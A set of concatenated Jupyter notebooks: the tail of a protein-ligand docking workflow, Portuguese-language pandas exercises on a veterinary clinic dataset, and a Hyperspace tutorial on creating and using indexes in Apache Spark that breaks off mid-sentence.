v1 = nglview.show_structure_file(output_vina_pdbqt, default=False)
v1.add_representation(repr_type='ball+stick',
selection=models)
v1.center()
v0._set_size('500px', '')
v1._set_size('500px', '')
def on_change(change):
v1._set_camera_orientation(change['new'])
v0.observe(on_change, ['_camera_orientation'])
HBox([v0, v1])
###Output
_____no_output_____
###Markdown
Select Docking PoseSelect a specific **docking pose** from the output list for **visual inspection**.Choose a **docking pose** from the **DropDown list**.
###Code
from Bio.PDB import PDBParser
parser = PDBParser(QUIET = True)
structure = parser.get_structure("protein", output_vina_pdbqt)
models = []
for i, m in enumerate(structure):
models.append(('model' + str(i), i))
mdsel = ipywidgets.Dropdown(
options=models,
description='Sel. model:',
disabled=False,
)
display(mdsel)
###Output
_____no_output_____
###Markdown
*** Extract a Docking PoseExtract a specific **docking pose** from the **docking** outputs. *****Building Blocks** used: - [extract_model_pdbqt](https://biobb-vs.readthedocs.io/en/latest/utils.htmlmodule-utils.extract_model_pdbqt) from **biobb_vs.utils.extract_model_pdbqt*****
###Code
from biobb_vs.utils.extract_model_pdbqt import extract_model_pdbqt
output_pdbqt_model = "output_model.pdbqt"
prop = {
"model": mdsel.value + 1
}
extract_model_pdbqt(input_pdbqt_path = output_vina_pdbqt,
output_pdbqt_path = output_pdbqt_model,
properties=prop)
###Output
2021-05-17 15:46:56,618 [MainThread ] [INFO ] Saving model 1 to output_model.pdbqt
###Markdown
*** Converting Ligand Pose to PDB formatConverting **ligand pose** to **PDB format**. *****Building Blocks** used: - [babel_convert](https://biobb-chemistry.readthedocs.io/en/latest/babelm.htmlmodule-babelm.babel_convert) from **biobb_chemistry.babelm.babel_convert*****
###Code
from biobb_chemistry.babelm.babel_convert import babel_convert
output_pdb_model = "output_model.pdb"
prop = {
"input_format": "pdbqt",
"output_format": "pdb",
"obabel_path": "obabel"
}
babel_convert(input_path = output_pdbqt_model,
output_path = output_pdb_model,
properties=prop)
###Output
2021-05-17 15:46:58,600 [MainThread ] [INFO ] Value is not compatible as a coordinates value
2021-05-17 15:46:58,602 [MainThread ] [INFO ] Not using any container
2021-05-17 15:46:58,658 [MainThread ] [INFO ] obabel -ipdbqt output_model.pdbqt -opdb -Ooutput_model.pdb
2021-05-17 15:46:58,659 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:46:58,660 [MainThread ] [INFO ] 1 molecule converted
###Markdown
*** Superposing Ligand Pose to the Target Protein StructureSuperposing **ligand pose** to the target **protein structure**, in order to see the **protein-ligand docking conformation**. Building a new **PDB file** with both **target and ligand** (binding pose) structures. *****Building Blocks** used: - [cat_pdb](https://biobb-structure-utils.readthedocs.io/en/latest/utils.htmlmodule-utils.cat_pdb) from **biobb_structure_utils.utils.cat_pdb*****
###Code
from biobb_structure_utils.utils.cat_pdb import cat_pdb
output_structure = "output_structure.pdb"
cat_pdb(input_structure1 = pdb_protein,
input_structure2 = output_pdb_model,
output_structure_path = output_structure)
###Output
2021-05-17 15:47:00,632 [MainThread ] [INFO ] File output_structure.pdb created
###Markdown
Comparing final result with experimental structure Visualizing and comparing the generated **protein-ligand** complex with the original **protein-ligand conformation** (downloaded from the PDB database), using **NGL viewer**. - **Licorice, element-colored** representation: **Experimental pose**.- **Licorice, green-colored** representation: **Docking pose**.Note that outputs from **AutoDock Vina** don't contain all the atoms, as the program works with a **united-atom representation** (i.e. only polar hydrogens).
###Code
view = nglview.NGLWidget()
# v1 = Experimental Structure
v1 = view.add_component(download_pdb)
v1.clear()
v1.add_representation(repr_type='licorice',
selection='STI',
radius=0.5)
# v2 = Docking result
v2 = view.add_component(output_structure)
v2.clear()
v2.add_representation(repr_type='cartoon', colorScheme = 'sstruc')
v2.add_representation(repr_type='licorice', radius=0.5, color= 'green', selection='UNL')
view._remote_call('setSize', target='Widget', args=['','600px'])
view
# align reference and output
code = """
var stage = this.stage;
var clist_len = stage.compList.length;
var i = 0;
var s = [];
for(i = 0; i <= clist_len; i++){
if(stage.compList[i] != undefined && stage.compList[i].structure != undefined) {
s.push(stage.compList[i])
}
}
NGL.superpose(s[0].structure, s[1].structure, true, ".CA")
s[ 0 ].updateRepresentations({ position: true })
s[ 0 ].autoView()
"""
view._execute_js_code(code)
view.render_image()
view.download_image(filename='ngl7.png')
view
###Output
_____no_output_____ |
prof_05_pandas_exercicios_series.ipynb | ###Markdown
Exercícios Pandas---
###Code
# faça seus imports aqui
import pandas as pd
###Output
_____no_output_____
###Markdown
EX01Criação e métodos de séries.
###Code
temperaturas = [15.4, 18.0, 22.5, 20.0, 20.3, 25.0]
###Output
_____no_output_____
###Markdown
__A.__ Crie uma série com os dados da lista fornecida. Utilize pd.Series e atribua a serie à variável s_temperaturas
###Code
s_temperaturas = pd.Series(temperaturas)
###Output
_____no_output_____
###Markdown
__B.__ Imprima o tipo do objeto s_temperaturas
###Code
type(s_temperaturas)
###Output
_____no_output_____
###Markdown
__C.__ Imprima o objeto s_temperaturas
###Code
print(s_temperaturas)
###Output
0 15.4
1 18.0
2 22.5
3 20.0
4 20.3
5 25.0
dtype: float64
###Markdown
__D.__ Imprima o numéro de linhas do objeto
###Code
s_temperaturas.shape
###Output
_____no_output_____
###Markdown
__E.__ imprima as 2 primeiras linhas
###Code
s_temperaturas.head(2)
###Output
_____no_output_____
###Markdown
__F__. imprima as 2 últimas linhas
###Code
s_temperaturas.tail(2)
###Output
_____no_output_____
###Markdown
__G__. imprima o maior valor
###Code
s_temperaturas.max()
###Output
_____no_output_____
###Markdown
__H__. imprima o menor valor
###Code
s_temperaturas.min()
###Output
_____no_output_____
###Markdown
__J__. utilize o método describe para visualizar estatísticas básicas da série
###Code
s_temperaturas.describe()
###Output
_____no_output_____
###Markdown
EX02Filtros e expressões em séries. __A.__ Crie uma série com as variáveis temperatura e indice definidas abaixo
###Code
temperaturas = [15.4, 18.0, 22.5, 20.0, 20.3, 25.0]
indice = pd.to_datetime(['2017-05-03','2017-05-04','2017-05-04','2017-05-05','2017-05-06','2017-05-07'])
s_temperaturas = pd.Series(temperaturas, index=indice)
s_temperaturas.head()
###Output
_____no_output_____
###Markdown
__B.__ Filtre os registros pelo índice 2017-05-04
###Code
s_temperaturas['2017-05-04']
###Output
_____no_output_____
###Markdown
__C.__ Filtre os registros pelo intervalo 2017-05-04 a 2017-05-06
###Code
s_temperaturas['2017-05-04':'2017-05-06']
###Output
_____no_output_____
###Markdown
__D.__ Filtre os registros das posições 1 a 3
###Code
s_temperaturas[1:4]
###Output
_____no_output_____
###Markdown
__E.__ Filtre os registros com temperatura maior que 20
###Code
s_temperaturas[s_temperaturas > 20]
###Output
_____no_output_____
###Markdown
EX03Criação e características de DataFrames. __A.__ Crie um dataframe utilizando a lista de tuplas abaixo.
###Code
# utilize esta variável para o nome das colunas
nomes_colunas = ['Espécie', 'Idade', 'Visitas', 'Prioridade']
clinica_veterinaria = [
('Gato', 6.0, 12, 'Sim'),
('Gato', 3.0, 23, 'Sim'),
('Cachorro', 10.0, 14, 'Sim'),
('Ramster', 4.0, 5, 'Não'),
('Tartaruga', 10.0, 11, 'Sim'),
('Tartaruga', 3.0, 2, 'Sim'),
('Gato', 12.0, 3, 'Não'),
('Ramster', 11.0, 26, 'Não'),
('Gato', 5.5, 29, 'Não'),
('Cachorro', 2.0, 28, 'Sim'),
('Coelho', 5.5, 1, 'Sim'),
('Tartaruga', 4.0, 21, 'Não'),
('Ramster', 1.0, 28, 'Sim'),
('Tartaruga', 3.5, 18, 'Não'),
('Ramster', 3.0, 20, 'Não'),
('Gato', 2.0, 16, 'Não'),
('Tartaruga', 10.5, 29, 'Não'),
('Cachorro', 10.5, 26, 'Sim'),
('Coelho', 10.0, 26, 'Sim'),
('Ramster', 9.5, 2, 'Não')
]
# crie o dataframe e atribua à variável 'df_clinica_veterinaria'
df_clinica_veterinaria = pd.DataFrame(clinica_veterinaria, columns=nomes_colunas)
# exiba as primeiras 5 linhas
df_clinica_veterinaria.head()
###Output
_____no_output_____
###Markdown
__B.__ Crie uma nova coluna com o resultado do número de visitas dividido pela idade. O nome da colunas deve ser "Visitas/Idade"
###Code
df_clinica_veterinaria['Visitas/Idade'] = df_clinica_veterinaria['Visitas']/df_clinica_veterinaria['Idade']
df_clinica_veterinaria.head()
###Output
_____no_output_____
###Markdown
__C.__ Ordene o Dataframe pela nova coluna "Visitas/Idade" em ordem decrescente
###Code
df_clinica_veterinaria.sort_values('Visitas/Idade', ascending=False).head()
###Output
_____no_output_____
###Markdown
__D.__ Selecione todos os registros com cachorros
###Code
df_clinica_veterinaria[df_clinica_veterinaria['Espécie'] == 'Cachorro']
###Output
_____no_output_____
###Markdown
__E.__ Selecione todos os registros com gatos com idade acima de 4 anos
###Code
expressao = df_clinica_veterinaria['Espécie'] == 'Gato'
expressao &= df_clinica_veterinaria['Idade'] > 4
# expressao = expressao & df_clinica_veterinaria['Idade'] > 4
df_clinica_veterinaria[expressao]
###Output
_____no_output_____
###Markdown
__F.__ Qual o total de visitas registradas na clínica?
###Code
df_clinica_veterinaria['Visitas'].sum()
###Output
_____no_output_____
###Markdown
__G.__ Existe algum Ramster com prioridade?
###Code
expressao = df_clinica_veterinaria['Espécie'] == 'Ramster'
expressao &= df_clinica_veterinaria['Prioridade'] == 'Sim'
df_clinica_veterinaria[expressao]
expressao = df_clinica_veterinaria['Espécie'] == 'Gato'
expressao &= df_clinica_veterinaria['Prioridade'] == 'Sim'
expressao.any()
###Output
_____no_output_____
###Markdown
__H.__ Qual a maior idade por espécie?
###Code
df_clinica_veterinaria[['Espécie', 'Idade']]\
.groupby('Espécie', as_index=False).max()
###Output
_____no_output_____
###Markdown
__I.__ Qual a média de idade por espécie?
###Code
df_clinica_veterinaria[['Espécie', 'Idade']]\
.groupby('Espécie', as_index=False).mean().sort_values('Idade', ascending=False)
# Gerador de clientes para clínica veterinária
sorteio_animais = ['Gato', 'Cachorro', 'Coelho', 'Ramster', 'Tartaruga']
sorteio_idades = list(np.arange(0.5, 13.0, step=0.5))
sorteio_visitas = list(np.arange(1, 30))
sorteio_prioridade = ['Sim', 'Não']
clinica_veterinaria = [(np.random.choice(sorteio_animais),
np.random.choice(sorteio_idades),
np.random.choice(sorteio_visitas),
np.random.choice(sorteio_prioridade),
) for i in range(20)
]
clinica_veterinaria
###Output
_____no_output_____
###Markdown
Exercícios Pandas---
###Code
# faça seus imports aqui
import pandas as pd
###Output
_____no_output_____
###Markdown
EX01Criação e métodos de séries.
###Code
temperaturas = [15.4, 18.0, 22.5, 20.0, 20.3, 25.0]
###Output
_____no_output_____
###Markdown
__A.__ Crie uma série com os dados da lista fornecida. Utilize pd.Series e atribua a serie à variável s_temperaturas
###Code
s_temperaturas = pd.Series(temperaturas)
s_temperaturas.head()
###Output
_____no_output_____
###Markdown
__B.__ Imprima o tipo do objeto s_temperaturas
###Code
type(s_temperaturas)
###Output
_____no_output_____
###Markdown
__C.__ Imprima o objeto s_temperaturas
###Code
s_temperaturas
###Output
_____no_output_____
###Markdown
__D.__ Imprima o numéro de linhas do objeto
###Code
s_temperaturas.shape[0]
###Output
_____no_output_____
###Markdown
__E.__ imprima as 2 primeiras linhas
###Code
s_temperaturas.head(2)
###Output
_____no_output_____
###Markdown
__F__. imprima as 2 últimas linhas
###Code
s_temperaturas.tail(2)
###Output
_____no_output_____
###Markdown
__G__. imprima o maior valor
###Code
s_temperaturas.max()
###Output
_____no_output_____
###Markdown
__H__. imprima o menor valor
###Code
s_temperaturas.min()
###Output
_____no_output_____
###Markdown
__J__. utilize o método describe para visualizar estatísticas básicas da série
###Code
s_temperaturas.describe()
###Output
_____no_output_____
###Markdown
EX02Filtros e expressões em séries. __A.__ Crie uma série com as variáveis temperatura e indice definidas abaixo
###Code
temperaturas = [15.4, 18.0, 22.5, 20.0, 20.3, 25.0]
indice = pd.to_datetime(['2017-05-03','2017-05-04','2017-05-04','2017-05-05','2017-05-06','2017-05-07'])
s_temperaturas = pd.Series(temperaturas, index=indice)
s_temperaturas.head()
###Output
_____no_output_____
###Markdown
__B.__ Filtre os registros pelo índice 2017-05-04
###Code
s_temperaturas['2017-05-04']
###Output
_____no_output_____
###Markdown
__C.__ Filtre os registros pelo intervalo 2017-05-04 a 2017-05-06
###Code
s_temperaturas.loc['2017-05-04':'2017-05-06']
###Output
_____no_output_____
###Markdown
__D.__ Filtre os registros das posições 1 a 3
###Code
s_temperaturas.iloc[1:4]
###Output
_____no_output_____
###Markdown
__E.__ Filtre os registros com temperatura maior que 20
###Code
s_temperaturas[ s_temperaturas > 20 ]
###Output
_____no_output_____
###Markdown
EX03Criação e características de DataFrames. __A.__ Crie um dataframe utilizando a lista de tuplas abaixo.
###Code
# utilize esta variável para o nome das colunas
nomes_colunas = ['Espécie', 'Idade', 'Visitas', 'Prioridade']
clinica_veterinaria = [
('Gato', 6.0, 12, 'Sim'),
('Gato', 3.0, 23, 'Sim'),
('Cachorro', 10.0, 14, 'Sim'),
('Ramster', 4.0, 5, 'Não'),
('Tartaruga', 10.0, 11, 'Sim'),
('Tartaruga', 3.0, 2, 'Sim'),
('Gato', 12.0, 3, 'Não'),
('Ramster', 11.0, 26, 'Não'),
('Gato', 5.5, 29, 'Não'),
('Cachorro', 2.0, 28, 'Sim'),
('Coelho', 5.5, 1, 'Sim'),
('Tartaruga', 4.0, 21, 'Não'),
('Ramster', 1.0, 28, 'Sim'),
('Tartaruga', 3.5, 18, 'Não'),
('Ramster', 3.0, 20, 'Não'),
('Gato', 2.0, 16, 'Não'),
('Tartaruga', 10.5, 29, 'Não'),
('Cachorro', 10.5, 26, 'Sim'),
('Coelho', 10.0, 26, 'Sim'),
('Ramster', 9.5, 2, 'Não')
]
# crie o dataframe e atribua à variável 'df_clinica_veterinaria'
# exiba as primeiras 5 linhas
###Output
_____no_output_____
###Markdown
__B.__ Crie uma nova coluna com o resultado do número de visitas dividido pela idade. O nome da colunas deve ser "Visitas/Idade" __C.__ Ordene o Dataframe pela nova coluna "Visitas/Idade" em ordem decrescente __D.__ Selecione todos os registros com cachorros __E.__ Selecione todos os registros com gatos com idade acima de 4 anos __F.__ Qual o total de visitas registradas na clínica? __G.__ Existe algum Ramster com prioridade? __H.__ Qual a maior idade por espécie? __I.__ Qual a média de idade por espécie?
###Code
# Gerador de clientes para clínica veterinária
sorteio_animais = ['Gato', 'Cachorro', 'Coelho', 'Ramster', 'Tartaruga']
sorteio_idades = list(np.arange(0.5, 13.0, step=0.5))
sorteio_visitas = list(np.arange(1, 30))
sorteio_prioridade = ['Sim', 'Não']
clinica_veterinaria = [(np.random.choice(sorteio_animais),
np.random.choice(sorteio_idades),
np.random.choice(sorteio_visitas),
np.random.choice(sorteio_prioridade),
) for i in range(20)
]
clinica_veterinaria
###Output
_____no_output_____ |
Notebooks/PySpark/Hitchhikers Guide to Hyperspace - Python.ipynb | ###Markdown
Hitchhiker's Guide to Hyperspace (Python) An Indexing Subsystem for Apache Spark™[Hyperspace](https://github.com/microsoft/hyperspace) introduces the ability for Apache Spark™ users to create indexes on their datasets (e.g., CSV, JSON, Parquet etc.) and leverage them for potential query and workload acceleration.In this notebook, we highlight the basics of Hyperspace, emphasizing on its simplicity and show how it can be used by just anyone.**Disclaimer**: Hyperspace helps accelerate your workloads/queries under two circumstances: 1. Queries contain filters on predicates with high selectivity (e.g., you want to select 100 matching rows from a million candidate rows) 2. Queries contain a join that requires heavy-shuffles (e.g., you want to join a 100 GB dataset with a 10 GB dataset)You may want to carefully monitor your workloads and determine whether indexing is helping you on a case-by-case basis. SetupTo begin with, let's start a new Spark™ session. Since this notebook is a tutorial merely to illustrate what Hyperspace can offer, we will make a configuration change that allow us to highlight what Hyperspace is doing on small datasets. By default, Spark™ uses *broadcast join* to optimize join queries when the data size for one side of join is small (which is the case for the sample data we use in this tutorial). Therefore, we disable broadcast joins so that later when we run join queries, Spark™ uses *sort-merge* join. This is mainly to show how Hyperspace indexes would be used at scale for accelerating join queries.The output of running the cell below shows a reference to the successfully created Spark™ session and prints out '-1' as the value for the modified join config which indicates that broadcast join is successfully disabled.
###Code
import random
session_id = random.randint(0,1000000)
data_path = "/hyperspace/data-{0}".format(session_id)
index_location = "/hyperspace/indexes-{0}".format(session_id)
# Please note that you DO NOT need to change this configuration in production.
# We store all indexes in the system folder within Synapse.
spark.conf.set("spark.hyperspace.system.path", index_location)
# Start your Spark session
spark
# Disable BroadcastHashJoin, so Spark will use standard SortMergeJoin. Currently Hyperspace indexes utilize SortMergeJoin to speed up query.
spark.conf.set("spark.sql.autoBroadcastJoinThreshold", -1)
# Verify that BroadcastHashJoin is set correctly
print(spark.conf.get("spark.sql.autoBroadcastJoinThreshold"))
spark.conf.set("spark.hyperspace.explain.displayMode", "html")
###Output
_____no_output_____
###Markdown
Data PreparationTo prepare our environment, we will create sample data records and save them as parquet data files. While we use Parquet for illustration, you can use other formats such as CSV. In the subsequent cells, we will also demonstrate how you can create several Hyperspace indexes on this sample dataset and how one can make Spark™ use them when running queries. Our example records correspond to two datasets: *department* and *employee*. You should configure "empLocation" and "deptLocation" paths so that on the storage account they point to your desired location to save generated data files. The output of running below cell shows contents of our datasets as lists of triplets followed by references to dataFrames created to save the content of each dataset in our preferred location.
###Code
from pyspark.sql.types import StructField, StructType, StringType, IntegerType
# Sample department records
departments = [(10, "Accounting", "New York"), (20, "Research", "Dallas"), (30, "Sales", "Chicago"), (40, "Operations", "Boston")]
# Sample employee records
employees = [(7369, "SMITH", 20), (7499, "ALLEN", 30), (7521, "WARD", 30), (7566, "JONES", 20), (7698, "BLAKE", 30)]
# Create a schema for the dataframe
dept_schema = StructType([StructField('deptId', IntegerType(), True), StructField('deptName', StringType(), True), StructField('location', StringType(), True)])
emp_schema = StructType([StructField('empId', IntegerType(), True), StructField('empName', StringType(), True), StructField('deptId', IntegerType(), True)])
departments_df = spark.createDataFrame(departments, dept_schema)
employees_df = spark.createDataFrame(employees, emp_schema)
emp_Location = data_path + "/employees.parquet"
dept_Location = data_path + "/departments.parquet"
employees_df.write.mode("overwrite").parquet(emp_Location)
departments_df.write.mode("overwrite").parquet(dept_Location)
###Output
_____no_output_____
###Markdown
Let's verify the contents of parquet files we created above to make sure they contain expected records in correct format. We later use these data files to create Hyperspace indexes and run sample queries.Running below cell, the output displays the rows in employee and department dataframes in a tabular form. There should be 14 employees and 4 departments, each matching with one of triplets we created in the previous cell.
###Code
# emp_Location and dept_Location are the user defined locations above to save parquet files
emp_DF = spark.read.parquet(emp_Location)
dept_DF = spark.read.parquet(dept_Location)
# Verify the data is available and correct
emp_DF.show()
dept_DF.show()
###Output
_____no_output_____
###Markdown
Hello Hyperspace Index!Hyperspace lets users create indexes on records scanned from persisted data files. Once successfully created, an entry corresponding to the index is added to the Hyperspace's metadata. This metadata is later used by Apache Spark™'s Hyperspace-enabled optimizer during query processing to find and use proper indexes. Once indexes are created, users can perform several actions: - **Refresh** If the underlying data changes, users can refresh an existing index to capture that. - **Delete** If the index is not needed, users can perform a soft-delete i.e., index is not physically deleted but is marked as 'deleted' so it is no longer used in your workloads. - **Vacuum** If an index is no longer required, users can vacuum it which forces a physical deletion of the index contents and associated metadata completely from Hyperspace's metadata.Below sections show how such index management operations can be done in Hyperspace.First, we need to import the required libraries and create an instance of Hyperspace. We later use this instance to invoke different Hyperspace APIs to create indexes on our sample data and modify those indexes.Output of running below cell shows a reference to the created instance of Hyperspace.
###Code
from hyperspace import *
# Create an instance of Hyperspace
hyperspace = Hyperspace(spark)
###Output
_____no_output_____
###Markdown
Create IndexesTo create a Hyperspace index, the user needs to provide 2 pieces of information:* An Apache Spark™ DataFrame which references the data to be indexed.* An index configuration object: IndexConfig, which specifies the *index name*, *indexed* and *included* columns of the index. As you might have noticed, in this notebook, we illustrate indexing using the [Covering Index](https://www.red-gate.com/simple-talk/sql/learn-sql-server/using-covering-indexes-to-improve-query-performance/), which are the default index in Hyperspace. In the future, we plan on adding support for other index types. We start by creating three Hyperspace indexes on our sample data: two indexes on the department dataset named "deptIndex1" and "deptIndex2", and one index on the employee dataset named 'empIndex'. For each index, we need a corresponding IndexConfig to capture the name along with columns lists for the indexed and included columns. Running below cell creates these indexConfigs and its output lists them.**Note**: An *index column* is a column that appears in your filters or join conditions. An *included column* is a column that appears in your select/project.For instance, in the following query:```sqlSELECT XFROM TableWHERE Y = 2```X can be an *index column* and Y can be an *included column*.
###Code
# Create index configurations
emp_IndexConfig = IndexConfig("empIndex1", ["deptId"], ["empName"])
dept_IndexConfig1 = IndexConfig("deptIndex1", ["deptId"], ["deptName"])
dept_IndexConfig2 = IndexConfig("deptIndex2", ["location"], ["deptName"])
###Output
_____no_output_____
###Markdown
Now, we create three indexes using our index configurations. For this purpose, we invoke "createIndex" command on our Hyperspace instance. This command requires an index configuration and the dataFrame containing rows to be indexed.Running below cell creates three indexes.
###Code
# Create indexes from configurations
hyperspace.createIndex(emp_DF, emp_IndexConfig)
hyperspace.createIndex(dept_DF, dept_IndexConfig1)
hyperspace.createIndex(dept_DF, dept_IndexConfig2)
###Output
_____no_output_____
###Markdown
List IndexesBelow code shows how a user can list all available indexes in a Hyperspace instance. It uses the `indexes` API which returns information about existing indexes as a Spark™'s DataFrame so you can perform additional operations. For instance, you can invoke valid operations on this DataFrame for checking its content or analyzing it further (for example filtering specific indexes or grouping them according to some desired property). Below cell uses DataFrame's `show` action to fully print the rows and show details of our indexes in a tabular form. For each index, we can see all the information Hyperspace has stored about it in its metadata. You will immediately notice the following: - `config.indexName`, `config.indexedColumns`, `config.includedColumns` are the fields that a user normally provides during index creation. - `status.status` indicates if the index is being actively used by the Spark's optimizer. - `dfSignature` is automatically generated by Hyperspace and is unique for each index. Hyperspace uses this signature internally to maintain the index and exploit it at query time. In the output below, all three indexes should have "ACTIVE" as status and their name, indexed columns, and included columns should match with what we defined in index configurations above.
###Code
hyperspace.indexes().show()
###Output
_____no_output_____
###Markdown
Delete IndexesA user can drop an existing index by using the `deleteIndex` API and providing the index name. Index deletion is a **soft-delete** operation i.e., only the index's status in the Hyperspace metadata from is changed from "ACTIVE" to "DELETED". This will exclude the deleted index from any future query optimization and Hyperspace no longer picks that index for any query. However, index files for a deleted index still remain available (since it is a soft-delete), so if you accidentally deleted the index, you could still restore it.The cell below deletes index with name "deptIndex2" and lists Hyperspace metadata after that. The output should be similar to above cell for "List Indexes" except for "deptIndex2" which now should have its status changed into "DELETED".
###Code
hyperspace.deleteIndex("deptIndex2")
hyperspace.indexes().show()
###Output
_____no_output_____
###Markdown
Restore IndexesA user can use the `restoreIndex` API to restore a deleted index. This will bring back the latest version of index into ACTIVE status and makes it usable again for queries. The cell below shows an example of `restoreIndex` API. We delete "deptIndex1" and restore it. The output shows "deptIndex1" first went into the "DELETED" status after invoking "deleteIndex" command and came back to the "ACTIVE" status after calling "restoreIndex".
###Code
hyperspace.deleteIndex("deptIndex1")
hyperspace.indexes().show()
hyperspace.restoreIndex("deptIndex1")
hyperspace.indexes().show()
###Output
_____no_output_____
###Markdown
Vacuum IndexesThe user can perform a **hard-delete** i.e., fully remove files and the metadata entry for a deleted index using the `vacuumIndex` API. Once done, this action is **irreversible** as it physically deletes all the index files associated with the index.The cell below vacuums the "deptIndex2" index and shows Hyperspace metadata after vaccuming. You should see metadata entries for two indexes "deptIndex1" and "empIndex" both with "ACTIVE" status and no entry for "deptIndex2".
###Code
hyperspace.vacuumIndex("deptIndex2")
hyperspace.indexes().show()
###Output
_____no_output_____
###Markdown
Enable/Disable HyperspaceHyperspace provides APIs to enable or disable index usage with Spark™. - By using `enableHyperspace` API, Hyperspace optimization rules become visible to the Apache Spark™ optimizer and it will exploit existing Hyperspace indexes to optimize user queries. - By using `disableHyperspace` command, Hyperspace rules no longer apply during query optimization. You should note that disabling Hyperspace has no impact on created indexes as they remain intact.Below cell shows how you can use these commands to enable or disable hyperspace. The output simply shows a reference to the existing Spark™ session whose configuration is updated.
###Code
# Enable Hyperspace
Hyperspace.enable(spark)
# Disable Hyperspace
Hyperspace.disable(spark)
###Output
_____no_output_____
###Markdown
Index UsageIn order to make Spark use Hyperspace indexes during query processing, the user needs to make sure that Hyperspace is enabled. The cell below enables Hyperspace and creates two DataFrames containing our sample data records which we use for running example queries. For each DataFrame, a few sample rows are printed.
###Code
# Enable Hyperspace
Hyperspace.enable(spark)
emp_DF = spark.read.parquet(emp_Location)
dept_DF = spark.read.parquet(dept_Location)
emp_DF.show(5)
dept_DF.show(5)
###Output
_____no_output_____
###Markdown
Hyperspace's Index TypesCurrently, Hyperspace can exploit indexes for two groups of queries: * Selection queries with lookup or range selection filtering predicates.* Join queries with an equality join predicate (i.e. Equi-joins). Indexes for Accelerating FiltersOur first example query does a lookup on department records (see below cell). In SQL, this query looks as follows:```sqlSELECT deptName FROM departmentsWHERE deptId = 20```The output of running the cell below shows: - query result, which is a single department name.- query plan that Spark™ used to run the query. In the query plan, the "FileScan" operator at the bottom of the plan shows the datasource where the records were read from. The location of this file indicates the path to the latest version of the "deptIndex1" index. This shows that according to the query and using Hyperspace optimization rules, Spark™ decided to exploit the proper index at runtime.
###Code
# Filter with equality predicate
eqFilter = dept_DF.filter("""deptId = 20""").select("""deptName""")
eqFilter.show()
hyperspace.explain(eqFilter, True, displayHTML)
###Output
_____no_output_____
###Markdown
Our second example is a range selection query on department records. In SQL, this query looks as follows:```sqlSELECT deptName FROM departmentsWHERE deptId > 20```Similar to our first example, the output of the cell below shows the query results (names of two departments) and the query plan. The location of data file in the FileScan operator shows that 'deptIndex1" was used to run the query.
###Code
# Filter with range selection predicate
rangeFilter = dept_DF.filter("""deptId > 20""").select("deptName")
rangeFilter.show()
hyperspace.explain(rangeFilter, True, displayHTML)
###Output
_____no_output_____
###Markdown
Our third example is a query joining department and employee records on the department id. The equivalent SQL statement is shown below:```sqlSELECT employees.deptId, empName, departments.deptId, deptNameFROM employees, departments WHERE employees.deptId = departments.deptId```The output of running the cell below shows the query results which are the names of 14 employees and the name of department each employee works in. The query plan is also included in the output. Notice how the file locations for two FileScan operators shows that Spark used "empIndex" and "deptIndex1" indexes to run the query.
###Code
# Join
eqJoin = emp_DF.join(dept_DF, emp_DF.deptId == dept_DF.deptId).select(emp_DF.empName, dept_DF.deptName)
eqJoin.show()
hyperspace.explain(eqJoin, True, displayHTML)
###Output
_____no_output_____
###Markdown
Support for SQL SemanticsThe index usage is transparent to whether the user uses DataFrame API or Spark™ SQL. The following example shows the same join example as before but using Spark SQL, showing the use of indexes if applicable.
###Code
from pyspark.sql import SparkSession
emp_DF.createOrReplaceTempView("EMP")
dept_DF.createOrReplaceTempView("DEPT")
joinQuery = spark.sql("SELECT EMP.empName, DEPT.deptName FROM EMP, DEPT WHERE EMP.deptId = DEPT.deptId")
joinQuery.show()
hyperspace.explain(joinQuery, True, displayHTML)
###Output
_____no_output_____
###Markdown
Explain APISo far, you might have observed we have been using the explain API provided by Hyperspace. The `explain` API from Hyperspace is very similar to Spark's `df.explain` API but allows users to compare their original plan vs the updated index-dependent plan before running their query. You have an option to choose from html/plaintext/console mode to display the command output. The following cell shows an example with HTML. The highlighted section represents the difference between original and updated plans along with the indexes being used.
###Code
eqJoin = emp_DF.join(dept_DF, emp_DF.deptId == dept_DF.deptId).select(emp_DF.empName, dept_DF.deptName)
spark.conf.set("spark.hyperspace.explain.displayMode", "html")
hyperspace.explain(eqJoin, True, displayHTML)
###Output
_____no_output_____
###Markdown
Refresh IndexesIf the original data on which an index was created changes, then the index will no longer capture the latest state of data and hence will not be used by Hyperspace to provide any acceleration. The user can refresh such a stale index using the `refreshIndex` API. This causes the index to be fully rebuilt and updates it according to the latest data records. Spoiler alert: if you are worried about fully rebuilding your index every time your data changes, don't worry! We will show you how to *incrementally refresh* your index in subsequent cells below.The two cells below show an example for this scenario:- First cell adds two more departments to the original departments data. It reads and prints list of departments to verify new departments are added correctly. The output shows 6 departments in total: four old ones and two new. Invoking "refreshIndex" updates "deptIndex1" so index captures new departments.- Second cell runs our range selection query example. The results should now contain four departments: two are the ones, seen before when we ran the query above, and two are the new departments we just added.
###Code
extra_Departments = [(50, "Inovation", "Seattle"), (60, "Human Resources", "San Francisco")]
extra_departments_df = spark.createDataFrame(extra_Departments, dept_schema)
extra_departments_df.write.mode("Append").parquet(dept_Location)
dept_DFrame_Updated = spark.read.parquet(dept_Location)
dept_DFrame_Updated.show(10)
hyperspace.refreshIndex("deptIndex1")
newRangeFilter = dept_DFrame_Updated.filter("deptId > 20").select("deptName")
newRangeFilter.show()
hyperspace.explain(newRangeFilter, True, displayHTML)
hyperspace.indexes().show()
# Clean-up the remaining indexes
hyperspace.deleteIndex("empIndex1")
hyperspace.deleteIndex("deptIndex1")
hyperspace.vacuumIndex("empIndex1")
hyperspace.vacuumIndex("deptIndex1")
###Output
_____no_output_____
###Markdown
Hybrid Scan for Mutable DatasetsOften times, if your underlying source data had some new files appended or existing files deleted, your index will get stale and Hyperspace decides not to use it. However, there are times where you just want to use the index without having to refresh it everytime. There could be multiple reasons for doing so: 1. You do not want to continuosly refresh your index but instead want to do it periodically since you understand your workloads the best. 2. You added/removed only a few files and do not want to wait for yet another refresh job to finish. To allow you to still use a stale index, Hyperspace introduces **Hybrid Scan**, a novel technique that allows users to utilize outdated or stale indexes (e.g., the underlying source data had some new files appended or existing files deleted), without refreshing indexes. To achieve this, when you set the appropriate configuration to enable Hybrid Scan, Hyperspace modifies the query plan to leverage the changes as following:- Appended files can be merged to index data by using **`Union` or `BucketUnion` (for join)**. Shuffling appended data can also be applied before merging, if needed.- Deleted files can be handled by injecting `Filter-NOT-IN` condition on **lineage column** of index data, so that the indexed rows from the deleted files can be excluded at query time. You can check the transformation of the query plan in below examples. Note: Hybrid scan is only supported for non-partitioned data. Support for partitioned data is currently being worked upon. Hybrid Scan for appended files - non-partitioned dataNon-partitioned data is used in below example. In this example, we expect Join index 